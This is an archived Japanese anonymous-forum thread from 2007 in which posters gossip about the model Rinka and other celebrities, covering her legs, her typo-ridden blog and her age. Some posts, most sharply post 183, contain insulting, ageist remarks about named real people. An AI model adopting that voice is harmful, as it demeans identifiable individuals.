私的に2位

170 :無名モデル:2007/11/30(金) 18:02:33 ID:???
モナと杉田かおる似てるねw

171 :無名モデル:2007/11/30(金) 21:53:40 ID:???
リンカは美人だけど知的とは程遠いので
そのアホさに時折心からがっかりすることもあるし
逆にそれが屈託のない可愛さだったりもする

昔キライだったのが最近はちょっとずつ好きになってきて
今は結構好きなので末永く頑張ってほしいんだけど
ブログ・・・誤字や表現をもうちょっと何とかしてほしいなぁ
ちょっと応援しづらいわ。

モナは美人で知的…なはずなのに どこか汚らしい
あんまし知性を感じないんだよね


172 :無名モデル:2007/12/01(土) 00:29:37 ID:???
モナが知的ってイメージあるんだ・・・
不倫って拒否反応しちゃうな〜。

梨花は、足ほんとキレイ。実際会ったときオドロキもんだった。
細くてまっすぐ。

173 :無名モデル:2007/12/01(土) 01:14:33 ID:8Uii0tHO
脚いいよねぇ〜。
そこで好きになった一人だわ。

174 :無名モデル:2007/12/01(土) 01:53:53 ID:???
最近またブログでヒャン吉の名前がよく出てくるようになったね。

175 :無名モデル:2007/12/01(土) 02:56:19 ID:???
やりすぎの都市伝説の観覧とVIVIのイベントで、生RINKAみたけど確かにかなり可愛かった
(若手モデルの中にいると歳のせいで?スタイルは若干劣ってたけど愛敬があって良かった)
観覧の時はTVで見てて不細工だと思ってたほしのあきのが若くて顔小さかったな
スタイルは梨花のが良かったけど(ほしのとMEGuMI本当にガリガリ)
杉本彩は超美人だった。真鍋は特に何も・・・



176 :無名モデル:2007/12/01(土) 09:25:27 ID:m7btS3hw
>>156
数作らないから高くつくのでは??

177 :無名モデル:2007/12/01(土) 20:11:18 ID:???
ヒャンブログに梨花からの携帯メール映した写真あるけど、
「早く会いたよ〜」って・・・脱字。
ブログだけじゃなく、普段からなんだね。

178 :無名モデル:2007/12/01(土) 21:57:02 ID:???
確かに足は綺麗。昔なんかの番組で自分の一番自慢な所は真っ直ぐで長い足って言ってた

179 :無名モデル:2007/12/03(月) 07:58:33 ID:???

■地デジで観たくない芸能人■

1位 ブラックマヨネーズのブツブツの方
2位 梨花
3位 コブクロのでかい方



180 :無名モデル:2007/12/03(月) 17:28:31 ID:TqbIgtVA
梨花何年も前にJAM解散したことも知らないんだ
すげー

181 :無名モデル:2007/12/03(月) 17:45:37 ID:???
関連スレ

http://life8.2ch.net/test/read.cgi/model/1196056769/

182 :無名モデル:2007/12/04(火) 01:36:00 ID:D/TRnkqH
つーかYUKIの方が年下に見えるって一体・・ww

183 :無名モデル:2007/12/04(火) 13:04:51 ID:???
10歳近く自分のほうが年いってんのに自分の方が若く見えるとでも
言いたいのか。年下のコに対して大人っぽいとか超きもいよ梨花。
どうみても肌の劣化はおまえの方が上だから。十分ばばあに見えるから
安心しろ。
いい加減自分がもう大人の女で決して若くないんだって少しは自覚しろ。
こういう内容のブログ見ると本当にこいつ根っからのアホなんだと思う。
年取ってんのに若いコ気取りの勘違い婆増殖中だね、最近は。

184 :無名モデル:2007/12/04(火) 13:29:07 ID:???
年取ってるのに若いコ気取れるのが梨花のいいところだと思う。
近所のおばはんの若作りとは圧倒的な差がある。

梨花もやってるからって、
ファッションそっくり真似しちゃうようなおばちゃんはイタイw

185 :無名モデル:2007/12/04(火) 15:28:07 ID:???
梨花って20代くらいに人気あるのかな。
やっぱ老け込んでるおばさんよりもお洒落で綺麗な年のとり方したいもんね。

それよりブログの音どうにかならんかね。
ページ変える度に鳴るとか事務所頭悪いんだね。マイナスイメージだよ。

35 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)